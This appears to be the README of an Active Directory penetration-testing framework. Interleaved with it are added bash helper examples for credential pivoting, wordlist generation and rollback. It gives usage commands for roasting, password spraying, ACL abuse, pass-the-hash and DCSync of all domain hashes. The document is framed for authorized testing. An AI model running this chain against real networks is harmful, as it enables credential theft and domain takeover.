ADAutoPwn
Active Directory Automated Pwnage Framework
From zero to Domain Admin — fully automated.
A single-command Active Directory assessment engine that chains the best of the
offensive toolchain (netexec, impacket, certipy, bloodyAD, kerbrute,
bloodhound-python…) into one coherent, recursive, colorful workflow.
Crafted & weaponized by c4sh3r · authorized engagements only
Most AD engagements start the same way: scan, fingerprint the DC, fix /etc/hosts,
sync the clock, hunt users, roast tickets, enumerate, look for ACL paths, check
ADCS, dump hashes. ADAutoPwn does all of it for you — and then keeps going.
Its core idea is a recursive pivot loop: the moment it recovers a new identity (a cracked hash, a LAPS/gMSA secret, a password it reset via an abused ACL), that identity is fed straight back into the engine and the entire enumeration + exploitation chain runs again as that user — until nothing new appears.
Every user, hash, ticket and finding is printed live and saved to disk.
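The recursive pivot loop described above, as an added example that is not ADAutoPwn's own code: a breadth-first work queue plus a "seen" set, which is what makes the chain terminate once no new identity turns up. Every identity and every "recovered" result below is constructed; `assess_identity` is a stand-in for the real enumeration and exploitation chain.

```bash
#!/usr/bin/env bash
# Added example (not ADAutoPwn's own code): the recursive pivot loop as a
# breadth-first work queue with a "seen" set. Each identity is assessed
# once; the loop ends when the queue drains, i.e. when nothing new appears.
# Identities are "user:secret" tokens and every result below is constructed.

# assess_identity ID: stand-in for the real enumeration + exploitation
# chain run as ID. Prints the identities it "recovered", space-separated.
assess_identity() {
  case "$1" in
    anonymous:-)             echo "svc_backup:Summer2025!" ;;                    # e.g. AS-REP roast cracked
    svc_backup:Summer2025!)  echo "svc_backup:Summer2025! jdoe:Winter2024!" ;;   # finds itself again + one new
    jdoe:Winter2024!)        echo "administrator:0123456789abcdef0123456789abcdef" ;;  # constructed NT hash
    *)                       echo "" ;;
  esac
}

# pivot_loop SEED...: assess each identity exactly once, breadth-first, and
# print the assessment order. Tokens are space-separated for brevity, so a
# real implementation needs NUL/newline delimiting for secrets with spaces.
pivot_loop() {
  local queue="$*" seen="" cur found f
  while [ -n "$queue" ]; do
    cur="${queue%% *}"                                  # pop the head of the queue
    queue="${queue#"$cur"}"; queue="${queue# }"
    case "$seen" in *" $cur "*) continue ;; esac        # already assessed: skip
    seen="$seen $cur "
    echo "$cur"
    found="$(assess_identity "$cur")"
    for f in $found; do
      case "$seen" in *" $f "*) continue ;; esac        # only enqueue unseen identities
      queue="${queue:+$queue }$f"
    done
  done
}

pivot_loop "anonymous:-"
```

The `seen` check happens both when enqueuing and when popping, so an identity that several earlier pivots recover independently is still assessed only once; that, not a fixed iteration cap, is what bounds the run.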
⚠️ Legal: Use only against systems you are explicitly authorized to test — a signed engagement, your own lab, or a CTF you're entitled to play. You are responsible for your actions.
| Stage | What happens |
|---|---|
| 0 · Discovery | nmap of key AD ports → capability matrix (Kerberos/SMB/LDAP/RPC/WinRM). Domain/FQDN via SMB or LDAP rootDSE + LDAPS cert (works on Kerberos-only DCs) |
| 1 · Host & Time | Auto-append to /etc/hosts (idempotent) + clock sync with the DC (Kerberos prerequisite) |
| 2 · Unauth enum | null/guest sessions, anonymous shares, RID brute, rpcclient, LDAP anon bind, enum4linux-ng, kerbrute userenum |
| 3 · AS-REP + Timeroast | GetNPUsers + MS-SNTP Timeroast — captured hashes are cracked and fed back into the pivot queue |
| 4 · Validate + TGT | TGT-first (getTGT -dc-ip, DNS-independent) → proves creds, cached & reused everywhere via -k --use-kcache |
| 5 · Auth enum | users, groups, password policy, descriptions, shares, MachineAccountQuota (LDAP, or rpcclient fallback when LDAP is closed) |
| ★ Username variants | ryan.naylor → rnaylor, r.naylor, naylor… validated with kerbrute (no lockout) |
| ★ Share looting | spider readable shares, download files, crack password-protected Office/zip/pdf/keepass, decrypt & read their contents, harvest passwords inside |
| ★ Secrets | Passwords in descriptions/files, GPP, LAPS, gMSA/dMSA, DPAPI, pre-created computer passwords → auto-pivot on everything recovered |
| ★ WinRM + privesc | who can WinRM; whoami /priv + /groups → maps SeImpersonate→Potato, SeBackup/SeDebug/SeRestore, Backup Operators, DnsAdmins… |
| ★ ACL/delegation abuse | GenericAll, WriteDACL, ForceChangePassword, AddSelf, WriteOwner, WriteSPN, constrained delegation — with --abuse it performs the chain: group add/reset, WriteSPN→Kerberoast, Shadow Credentials, RBCD, S4U-to-Administrator, and DCSync |
| ★ Relay & coercion | SMB/LDAP signing checks, coerce_plus (PetitPotam/PrinterBug/DFSCoerce), spooler, WebDAV → relay playbook with your IP |
| ★ Trusts | domain & cross-forest trusts, foreign security principals, cross-forest Kerberoast |
| 6 · Kerberoast | GetUserSPNs for SPN accounts (incl. cross-forest) |
| 7 · ADCS | certipy scan for ESC1…ESC16, and with --abuse auto-exploit ESC1 (request a cert as Administrator → recover its hash/TGT → pivot) |
| 8 · BloodHound | full All collection → importable .zip + a self-contained interactive graph.html (offline, with built-in Linux/Windows abuse commands per edge) |
| 9 · DCSync | secretsdump -just-dc when privileges allow → entire domain's NTLM hashes |
| ★ NTDS offline | if NTDS.dit + SYSTEM are looted from shares → secretsdump -ntds LOCAL |
| ★ Report | a consolidated, human-readable report.md + tidy loot dir (enum/ · secrets/ · raw/) |
| ∞ · Pivot + spray | every recovered identity/secret re-enters the engine; recovered passwords are sprayed across all users to find more |
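Stage 0's capability matrix, and the project's convention of gating techniques on `CAP_*` flags, as an added example that is not ADAutoPwn's own code. It parses a constructed nmap grepable-output (`-oG`) line into `CAP_*` assignments and shows a phase function that skips itself when its transport is closed. The port-to-capability mapping and the function names are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not ADAutoPwn's own code): deriving a Stage 0 capability
# matrix (CAP_* flags) from nmap grepable output (-oG), then gating a
# technique on it. The -oG line below is constructed: a DC with Kerberos,
# LDAP and SMB open but MSRPC and WinRM filtered.

# In -oG output fields are tab-separated and each port entry is
# "port/state/proto/owner/service/rpcinfo/version/", separated by ", ".
NMAP_GREPABLE="$(printf 'Host: 10.10.10.10 ()\tPorts: 88/open/tcp//kerberos-sec///, 135/filtered/tcp//msrpc///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 636/open/tcp//ldapssl///, 5985/filtered/tcp//wsman///\tIgnored State: closed (994)')"

# open_ports LINE: the open TCP ports, one per line.
open_ports() {
  printf '%s\n' "$1" | tr '\t' '\n' | sed -n 's/^Ports: //p' | tr ',' '\n' \
    | awk -F/ '$2=="open" && $3=="tcp" {gsub(/^ +/,"",$1); print $1}'
}

# capability_matrix LINE: emit CAP_KRB/SMB/LDAP/RPC/WINRM as shell assignments.
capability_matrix() {
  local ports p krb=0 smb=0 ldap=0 rpc=0 winrm=0
  ports="$(open_ports "$1")"
  for p in $ports; do
    case "$p" in
      88|464)            krb=1 ;;
      139|445)           smb=1 ;;
      389|636|3268|3269) ldap=1 ;;
      135)               rpc=1 ;;
      5985|5986)         winrm=1 ;;
    esac
  done
  printf 'CAP_KRB=%d CAP_SMB=%d CAP_LDAP=%d CAP_RPC=%d CAP_WINRM=%d\n' \
    "$krb" "$smb" "$ldap" "$rpc" "$winrm"
}

# phase_winrm_check MATRIX: a technique gated on CAP_WINRM. Returns 0 when
# it ran, 2 when skipped, so callers can tell "nothing found" from "not tried".
phase_winrm_check() {
  local CAP_KRB CAP_SMB CAP_LDAP CAP_RPC CAP_WINRM
  eval "$1"
  if [ "$CAP_WINRM" -ne 1 ]; then
    echo "[skip] 5985/5986 not open: who-can-WinRM check skipped"
    return 2
  fi
  echo "[run ] netexec winrm <DC_IP> -u <user> -p <pass>"   # a real run would call netexec here
}

MATRIX="$(capability_matrix "$NMAP_GREPABLE")"
echo "$MATRIX"
phase_winrm_check "$MATRIX" || true
```

Returning a distinct "skipped" status matters for the report: a Kerberos-only DC that never had WinRM checked should not read as "no WinRM access" in `report.md`.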
Plus:
- 🕸️ Interactive attack graph — a single self-contained `graph.html` (no server, no internet, no BloodHound install). It opens focused on the attack paths to Domain Admins / DC from what you own; click any node to get the exact Linux and Windows abuse commands for each ACL edge (GenericAll, WriteDacl, Shadow Credentials, RBCD, DCSync…). Auto-opens after a run; search/expand the rest. Use it standalone on any BloodHound zip: `adautopwn --graph data.zip`.
- 🔐 Kerberos-first by default — works even when NTLM is disabled, and is quieter. `--ntlm` to force NTLM.
- 🧠 Domain-focused wordlist auto-generated from the target (`Season+Year`, `Name+123!`, …) and tried first for offline cracking; optional capped online spray with `--spray`.
- ♻️ Self-feed / resume — got creds or users by hand? Pass them with `--creds-file`/`--users-file` (or reuse the same `-o` loot dir) and the engine continues from there.
- 🩹 Crack by default — captured AS-REP / Kerberoast / NTLM hashes are cracked automatically (`--no-crack` to disable); cracked creds re-pivot.
- 🥷 `--stealth` — skips noisy techniques and adds jitter between actions.
- 🧹 Responsible cleanup — every change the tool makes (group adds, password resets, owner/SPN edits, `/etc/hosts`) is tracked in `rollback.log` and revertible with `--cleanup`. No event-log wiping / anti-forensics — by design.
- 🎨 Modern, colorful, real-time output (every user, hash and step printed live). Plain-text log saved alongside.
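The username-variant stage and the domain-focused wordlist bullet, as one added example that is not ADAutoPwn's own code. The page does not document the exact naming schemes or password patterns the tool generates, so the schemes, suffixes, sample user, domain and year below are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not ADAutoPwn's own code): expanding a firstname.lastname
# username into common AD naming schemes, and building a small target-derived
# password list (Season+Year, Name+123!, ...). Sample user, domain and year
# are constructed.

# username_variants ryan.naylor: one candidate per line, de-duplicated.
# Anything without a dot is returned unchanged (no safe way to split it).
username_variants() {
  local full="$1" first last
  first="${full%%.*}"; last="${full#*.}"
  if [ "$first" = "$last" ]; then echo "$full"; return; fi
  printf '%s\n' \
    "$full" "$first$last" "${first:0:1}$last" "${first:0:1}.$last" "$last" \
    "$first" "$last$first" "$last.${first:0:1}" "$last${first:0:1}" \
    "$first.${last:0:1}" "$first${last:0:1}" "${first:0:3}${last:0:3}" \
    | awk '!seen[$0]++'
}

# domain_wordlist corp.local 2025: season+year (this year and last, with and
# without "!") plus company-name / Welcome / Password bases with the usual
# suffixes. Meant to be tried before rockyou, e.g.
#   hashcat -m 18200 asrep_hashes.txt domain_wordlist.txt
domain_wordlist() {
  local domain="$1" year="$2" name cap y season base suffix
  name="${domain%%.*}"                                                        # corp.local -> corp
  cap="$(printf '%s' "${name:0:1}" | tr '[:lower:]' '[:upper:]')${name:1}"   # -> Corp
  for y in "$year" "$((year - 1))"; do
    for season in Spring Summer Autumn Winter; do
      for suffix in "" "!"; do echo "$season$y$suffix"; done
    done
  done
  for base in "$cap" Welcome Password; do
    for suffix in "" 1 123 "123!" "$year" "$year!" "@$year"; do echo "$base$suffix"; done
  done
}

# Variants are validated without lockout risk via Kerberos pre-auth probing:
#   username_variants ryan.naylor > variants.txt
#   kerbrute userenum -d corp.local --dc 10.10.10.10 variants.txt
username_variants ryan.naylor
domain_wordlist corp.local 2025
```

Only the offline use of the wordlist is lockout-free; the online `--spray` path must stay under the domain's lockout threshold (Stage 5 collects the password policy for exactly that reason).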
```bash
git clone https://github.com/c4sh3r/ADAutoPwn.git
cd ADAutoPwn
chmod +x install.sh adautopwn.sh
./install.sh   # installs the whole toolchain (apt + pipx + kerbrute + rockyou)
```

On Kali/Parrot most dependencies are already present; install.sh fills the gaps.
Python tools are listed in `requirements.txt` and installed in isolation via `pipx` (with a `pip --user` fallback). `kerbrute` is fetched as a Go binary into `/opt/kerbrute`.

```bash
ln -sf "$PWD/adautopwn.sh" ~/.local/bin/adautopwn   # ~/.local/bin is on PATH
# now just: adautopwn -t <DC_IP> ...
```

(install.sh also creates a /usr/local/bin/adautopwn symlink when it can.)
System (apt): nmap · smbclient · smbmap · rpcclient · ldap-utils ·
ntpdate · enum4linux-ng · john · hashcat · seclists
Python (pipx/pip): netexec · impacket · certipy-ad · bloodhound ·
bloodyAD · ldapdomaindump
Standalone: kerbrute → /opt/kerbrute (override with KERBRUTE_BIN=...)
sudo is requested once, for clock sync and the /etc/hosts entry.
```bash
adautopwn -t <DC_IP> [-d <domain>] [-u <user>] [-p <pass> | -H <nt_hash>] [options]
```
| Flag | Description |
|---|---|
| `-t <ip>` | Domain Controller IP (required) |
| `-d <domain>` | Domain FQDN (auto-detected if omitted) |
| `-u <user>` | Domain username |
| `-p <pass>` | Cleartext password |
| `-H <hash>` | NT hash (pass-the-hash) |
| `-o <dir>` | Output/loot directory (reuse it to resume) |
| `-w <list>` | Cracking wordlist (default: rockyou) |
| `--sudo-pass <p>` | Sudo password for unattended /etc/hosts + time sync (or `SUDO_PASS=…`) |
| `--creds-file <f>` | Feed extra credentials to continue from (`user:password` / `user:nthash`) |
| `--users-file <f>` | Merge an external username list (spray / AS-REP / variants) |
| `--no-crack` | Disable hash cracking (cracking is ON by default) |
| `--spray` | Also spray the domain-focused wordlist online |
| `--abuse` | Actively exploit ACLs (group adds, password resets, WriteSPN roast) — tracked for rollback |
| `--auto-pwn` | Convenience alias for `--abuse --spray -y`; `--abuse` remains the main exploitation switch |
| `--cleanup` | Revert every tracked change and exit |
| `--stealth` | OPSEC mode: skip noisy techniques + jitter |
| `--ntlm` | Force NTLM (default is Kerberos-first) |
| `--no-bh` | Skip BloodHound collection |
| `--no-open` | Don't auto-open graph.html in a browser |
| `--graph <zip>` | Standalone: render a BloodHound zip → graph.html and open it (no scan) |
| `--owned <file>` | Mark these principals (one per line) as compromised in the graph |
| `-y, --yes` | Assume yes — fully unattended |
| `--no-color` | Disable colors |
| `-h, --help` | Help |
Only `-t` is required. With no credentials it runs every unauthenticated phase; add `-u`/`-p` (or `-H`) and it unlocks the rest and pivots recursively. The only opt-in (loud/destructive) extras are `--abuse` and `--spray`.
```bash
# Zero-credential recon (users, AS-REP, anon shares, trusts)
adautopwn -t 10.10.10.10

# Full authenticated, auto-cracking (on by default), unattended (Kerberos by default)
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' -y

# Go loud: also abuse ACLs (add to groups / reset passwords) with rollback
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' --abuse

# Pass-the-hash straight through to DCSync
adautopwn -t 10.10.10.10 -d corp.local -u admin -H 31d6cfe0d16ae931b73c59d7e0c089c0

# Quiet engagement
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' --stealth

# Clean up after yourself
adautopwn -t 10.10.10.10 --cleanup -o loot_corp.local_20260607_2210

# Just visualize an existing BloodHound zip — no scan, no creds
adautopwn --graph ~/Downloads/20260608_bloodhound.zip
adautopwn --graph data.zip --owned owned_users.txt   # flag what you already control
```

Got a credential or a list of users by other means? Hand them over and the engine continues from there (reusing the same `-o` keeps all prior loot):

```bash
# Continue an engagement with creds you found manually
printf 'svc_sql:Summer2025!\nbackupadmin:31d6cfe0d16ae931b73c59d7e0c089c0\n' > creds.txt
adautopwn -t 10.10.10.10 -d corp.local --creds-file creds.txt -o loot_corp.local_20260607_2210

# Seed a custom user list (for spray / AS-REP / variant generation)
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ss' --users-file users.txt
```

Everything is printed live and written to a timestamped loot directory. At the end the dir is tidied: trophies + resume-critical files stay on top, everything else is grouped into subfolders and empty files are pruned.
```text
loot_<domain>_<date>/
├── report.md               # ⭐ consolidated, human-readable engagement report
├── graph.html              # ⭐ interactive offline attack graph (auto-opens)
├── adautopwn.log           # full plain-text transcript
├── users_all.txt           # consolidated, de-duplicated user list
├── found_passwords.txt     # every recovered password (sprayed + resumed)
├── credential_map.txt      # what we recovered & where it came from
├── asrep_hashes.txt        # AS-REP roast (hashcat -m 18200)
├── kerberoast_hashes.txt   # Kerberoast (hashcat -m 13100)
├── secretsdump.txt         # DCSync dump
├── cracked_passwords.txt   # cracked hashes → plaintext
├── *.ccache                # reusable Kerberos tickets
├── rollback.log            # undo actions for --cleanup
├── enum/                   # users/groups, password policy, nmap, domain wordlist
├── secrets/                # LAPS · gMSA · GPP · DPAPI · ACL dumps · trusts · ADCS · coercion
├── shares/                 # files looted from readable shares
├── bloodhound/*.zip        # BloodHound collection
└── raw/                    # misc intermediates (cracked docs, file hashes…)
```
ADAutoPwn is built for professional engagements, so it cleans up after itself:
- Every mutation (group membership added, password reset, owner changed, `/etc/hosts` entry) is recorded as an undo command in `rollback.log`. `--cleanup` reads that file and reverts the environment.
What it deliberately does not do: clear Windows event logs or perform
anti-forensics. That breaks the client's evidence chain and is out of scope for
legitimate testing. Stealth here means being quiet (--stealth, Kerberos,
jitter), not destroying evidence.
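The record-then-revert mechanism above, together with Stage 1's idempotent `/etc/hosts` append, as an added example that is not ADAutoPwn's own `rollback.log` implementation (whose on-disk format this page does not document). A scratch file stands in for `/etc/hosts` so it runs without sudo; the hosts entry and the illustrative bloodyAD undo line are constructed.

```bash
#!/usr/bin/env bash
# Added example (not ADAutoPwn's own code): a minimal rollback log in the
# spirit of rollback.log / --cleanup. Every change is recorded as the shell
# command that undoes it; cleanup replays the log newest-first so changes that
# depend on earlier ones are undone before them. A temp file stands in for
# /etc/hosts; the entry and domain are constructed.

RB_LOG="${RB_LOG:-rollback.log}"

# rb_record 'undo command': append one undo line (eval'd by rb_cleanup).
# A group add would record something like this (illustrative, not run here):
#   rb_record "bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' remove groupMember 'Backup Operators' jdoe"
rb_record() { printf '%s\n' "$1" >> "$RB_LOG"; }

# hosts_add FILE IP FQDN [ALIAS...]: idempotent append. Only a line that was
# actually added gets an undo entry, so repeated runs never double-revert.
hosts_add() {
  local file="$1" ip="$2"; shift 2
  local entry="$ip $*"
  if grep -qxF -- "$entry" "$file" 2>/dev/null; then return 0; fi   # already present
  printf '%s\n' "$entry" >> "$file"
  # undo = drop exactly this line (grep -v exits 1 on an empty result, hence || true)
  rb_record "grep -vxF -- '$entry' '$file' > '$file.tmp' || true; mv -f '$file.tmp' '$file'"
}

# rb_cleanup: replay undo commands in reverse order, then clear the log.
# A failing undo is reported and left for manual review instead of aborting.
rb_cleanup() {
  local n cmd
  [ -s "$RB_LOG" ] || { echo "nothing to revert"; return 0; }
  n=$(wc -l < "$RB_LOG" | tr -d ' ')
  while [ "$n" -gt 0 ]; do
    cmd=$(sed -n "${n}p" "$RB_LOG")
    echo "[cleanup] $cmd"
    eval "$cmd" || echo "[cleanup] FAILED, review manually: $cmd" >&2
    n=$((n - 1))
  done
  : > "$RB_LOG"
}

# demo: the whole record / replay cycle against a scratch hosts file.
demo() {
  local tmp; tmp=$(mktemp -d)
  RB_LOG="$tmp/rollback.log"
  printf '127.0.0.1 localhost\n' > "$tmp/hosts"
  hosts_add "$tmp/hosts" 10.10.10.10 dc01.corp.local corp.local dc01
  hosts_add "$tmp/hosts" 10.10.10.10 dc01.corp.local corp.local dc01   # no-op, nothing recorded
  echo "--- before cleanup ($(wc -l < "$RB_LOG" | tr -d ' ') undo entry)"; cat "$tmp/hosts"
  rb_cleanup
  echo "--- after cleanup"; cat "$tmp/hosts"
  rm -rf "$tmp"
}

demo
```

Reverse replay is the important property: if the tool reset a password and then used that account to add itself to a group, the group membership must be removed with the still-valid credential before the password is restored.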
ADAutoPwn is free and source-available (noncommercial), built and maintained on a lot of late nights (testing against real labs, adding attack techniques, fixing edge cases). If it saved you time on an engagement or helped you learn, consider buying me a coffee — it directly fuels the next feature. 🙏
Contributions are very welcome — this is a community tool and the AD attack surface is huge. Whether you fix a parser edge-case or add a whole new technique, PRs and issues are appreciated.
```bash
# 1. Fork & clone
git clone https://github.com/<you>/ADAutoPwn.git && cd ADAutoPwn
# 2. Branch
git checkout -b feature/my-technique
# 3. Hack on adautopwn.sh — keep the house style:
#    - one `phase_*` function per stage, wired into assess_current_credential()
#    - gate techniques on the CAP_* capability flags
#    - print findings with info/ok/warn/loot, save artifacts to $OUTDIR
#    - anything that changes the target → rb_record for --cleanup
#    - run `bash -n adautopwn.sh` (must stay clean) and test on a lab/HTB box
# 4. PR with a short description + sample output
```

Please test against a lab or a box you're allowed to use, and never commit loot/credentials (the `.gitignore` already blocks the usual files).
- Parser hardening — make the bloodyAD / netexec output parsing more robust across versions (the ACL and trust parsers are the juiciest targets).
- More ADCS ESCs — extend the auto-exploit beyond ESC1 (ESC4/ESC8/ESC9…).
- Offline DPAPI — decrypt masterkey + credential blobs looted from shares.
- More document types — OneNote, `.kdb`, `.config` connection strings, etc.
- Graph edges — add `AdminTo`/`CanRDP`/session-based lateral edges and more abuse recipes to the graph's built-in command library.
- WinRM post-ex — pull `cmdkey /list`, scheduled tasks, saved creds when a shell is available.
- Coercion-to-relay glue — optional `--relay` that launches `ntlmrelayx` plus a coercion trigger end-to-end (opt-in).

Pick one, open an issue to claim it, and go 🚀
PolyForm Noncommercial 1.0.0 — see LICENSE. Free to use, modify
and share for noncommercial purposes (research, education, personal use,
nonprofits). Commercial use, selling or reselling is not permitted — all
commercial rights are reserved by the author (c4sh3r); contact for a
commercial license. Provided for authorized security testing only; the
author assumes no liability for misuse.